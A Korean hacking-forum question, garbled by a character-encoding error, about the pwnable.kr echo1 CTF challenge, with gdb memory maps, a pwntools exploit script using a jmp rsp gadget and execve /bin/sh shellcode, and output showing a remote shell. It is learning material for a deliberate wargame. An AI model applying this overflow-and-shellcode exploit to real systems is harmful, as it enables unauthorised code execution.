½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2011 [º¹»ç]


ÀÌÀü±Û http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000

ÀÌÀü¿¡ echo1  Ç®À̸¦ ºÁµµ ÀÌÇØ°¡ ¾È°¡¼­ Áú¹®±ÛÀ» ¿Ã·È¾ú´Âµ¥, ÇØ°áÀÌ ¾ÈµÅ¼­ ´ÙÀ½¿¡ º¸°Ú´Ù°íÇÏ°í ³Ñ¾î°¬½À´Ï´Ù.

À̹ø¿¡ echo1 ¹®Á¦¸¦ ´Ù½Ãº¸´Âµ¥ ¿©ÀüÈ÷ ÀÌÇØ°¡ °¡Áö ¾Ê½À´Ï´Ù.

ºÐ¸íÈ÷ echo1¿¡¼­ ¿À¹öÇ÷ΰ¡ ¹ß»ýÇÏ°í, NX°¡ Àû¿ëµÇ¾îÀÖÁö ¾Ê¾Æ ½©Äڵ带 ½ÇÇà½ÃÅ°´Â ¹®Á¦·Î º¸ÀÔ´Ï´Ù. ±×·±µ¥ ¾î¶»°Ô ½ÇÇàÀ» ½Ãų°ÍÀΰ¡°¡ °ü°ÇÀε¥, Ç®À̸¦ º¸´Ï id ¿µ¿ª¿¡ jmp rspÀÇ opcode(\xff\xe4)¸¦ ÀúÀåÇÏ°í ÀÌ°É ½ÇÇà½ÃÅ°´õ¶ó±¸¿ä. (rsp´Â ½©Äڵ带 °¡¸®Å°°íÀÖ½À´Ï´Ù.)

¹®Á¦´Â id ¿µ¿ª¿¡´Â ½ÇÇà±ÇÇÑÀÌ ¾ø¾î¼­ opcode¸¦ ÀúÀåÇصµ ½ÇÇàÇÒ¼ö°¡ ¾ø½À´Ï´Ù.
±×·¡¼­ rip¸¦ id·Î Á¶ÀýÇÑ´Ù°íÇصµ, ½ÇÇàÇÏ·Á°íÇϸé SIGSEGV°¡ ¹ß»ýÇÕ´Ï´Ù. ·ÎÄÿ¡¼­´Â¿ä.
±Ùµ¥ ¸®¸ðÆ®·ÎÇϸé Àß µË´Ï´Ù?  Á» È¥¶õ½º·¯¿îµ¥ ¹» ³õÄ¡°íÀִ°ɱî¿ä..

[µð¹ö±ë Á¤º¸]

(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'


(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621                             /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621                             /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621                             /home/ubuntu/ctf/echo1   // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ¾øÀ½.
(»ý·«)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]   // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ÀÖÀ½
(»ý·«)


(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>


[Àͽº ÄÚµå]
from pwn import *

#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")

name = jmp_rsp
name_addr = 0x6020a0
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1")        # 1. BOF

payload = b"a"*0x20 + b"b"*0x8   # buf + rbp
payload += p64(name_addr)   # ret
payload += sc
p.sendline(payload)

p.interactive()


[½ÇÇà °á°ú]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$          aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$              id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1)

  Hit : 1135     Date : 2022/10/05 12:21



    
turttle2s https://ray3708.tistory.com/28

½ÇÁ¦·Î µ¥ÀÌÅÍ ¿µ¿ª¿¡µµ ½ÇÇà±ÇÇÑÀÌ ÀÖ°í, ·ÎÄÿ¡¼­ Àû¿ëÀÌ ¾ÈµÈ ÀÌÀ¯´Â Ä¿³Î ¹öÀü Â÷À̶ó°í ÇÕ´Ï´Ù
2022/11/02  
turttle2s ¹®Á¦ ¼­¹ö¿¡ µé¾î°¡¼­ È®ÀÎÇغ¼ »ý°¢À» ¾ÈÇ߳׿ä 2022/11/02  
  pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1134
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 808
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 801
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1054
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 860
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1620
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1364
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1638
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1502
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1724
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3097
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1773
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1616
1561   »ç±â[2]     jas08
03/31 1912
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1660
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2179
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1671
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1763
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1638
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2107
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org